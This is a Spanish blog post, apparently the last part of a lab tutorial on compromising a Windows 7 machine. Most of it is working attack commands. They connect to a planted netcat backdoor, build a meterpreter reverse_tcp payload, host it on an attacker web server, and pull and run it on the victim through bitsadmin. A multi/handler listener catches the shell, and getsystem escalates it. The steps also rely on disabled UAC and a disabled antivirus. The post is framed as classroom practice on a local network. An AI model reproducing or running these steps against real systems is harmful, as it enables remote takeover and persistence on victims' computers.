Seguimos con el Hacking Windows 7 con antivirus, ver la parte 2 si no la has visto, esta ya es la 3 y ultima parte. Asi que Happy Hacking!!
Pero podemos ver todos los usuarios con: net user
También podemos ver gráficamente, inicio > botón derecho sobre equipo "Administrar" > Usuarios y grupos locales > Usuarios
/*Necesitaríamos hacer otros cambios para ocultarlo en estos sitios*/
Ahora vamos a reiniciar a la victima para ver si todo funciona correctamente. Meterpreter pierde la conexion.
Una vez reiniciado veremos nuestra obra, para comprobar los cambios que hemos hecho.
Comprobamos que el UAC esta desactivado, para ello podemos clickar en cualquier archivo que necesite permisos de administrador para ejecutarse y no nos saldrá la ventana para aceptar.
Otra cosa interesante es probar comandos que antes teníamos con acceso denegado y ahora nos deja como es el caso de at, que es para ejecutar comandos a una hora determinada.
Ahora vamos a entrar por el backdoor que hemos creado.
Lo primero que hacemos es lanzar un nmap para comprobar el estado de nuestro puerto. nmap 192.168.1.43
Y ahora con netcat nos conectamos, nc -vv 192.168.1.43 12345
Ahora vamos a descargar una imagen de internet al ordenador de la victima
bitsadmin /transfer mznlabsec /download /priority normal <enlace> C:\mznlabsec.jpg
Ahora vamos a conseguir una consola de meterpreter descargandolas de nuestro server.
Creamos un payload con msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=1234 X > /var/www/shell.exe
/*Esto lo detectaría el antivirus, para esta practica lo desactivamos*/
Lanzamos apache: service apache2 start
Creamos un trabajo al que añadiremos una o mas tareas para ejecutarlas con posterioridad: bitsadmin /create kali
Ahora añadimos la tarea a kali_linux: bitsadmin /addfile kali_linux http://192.168.1.67/shell.exe c:\Users\shell.exe
Y para ejecutarlo hacemos: bitsadmin /resume kali_linux
Podemos ver el estado de la ejecución introduciendo: bitsadmin /info kali_linux , y para verlo mas destallado bitsadmin /info kali_linux /verbose
Otra opción interesante con bitsadmin es ver los trabajos, para verlos usaremos: bitsadmin /list
Y para finalizar y ver el trabajo hacemos: bitsadmin /complete kali_linux
En nuestro Windows 7 ya aparece.
Pues ya que esta vamos a realizar una conexion a esta shell:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=1234 E
Ahora desde nuestra shell de windows, nos ponemos en la ruta y ejecutamos con: shell.exe
Y ahora ya realiza la conexion y obtenemos la shell de meterpreter.
Ahora ya podemos ejecutar un getsystem y seremos los jefes del equipo.
Agradecer a Rodolfo Ceceña y Backtrack Academy por esta fantástica clase. Se aprende mucho con estas clases practicas.
Saludos guerreros y Happy Hacking!!
No hay comentarios:
Publicar un comentario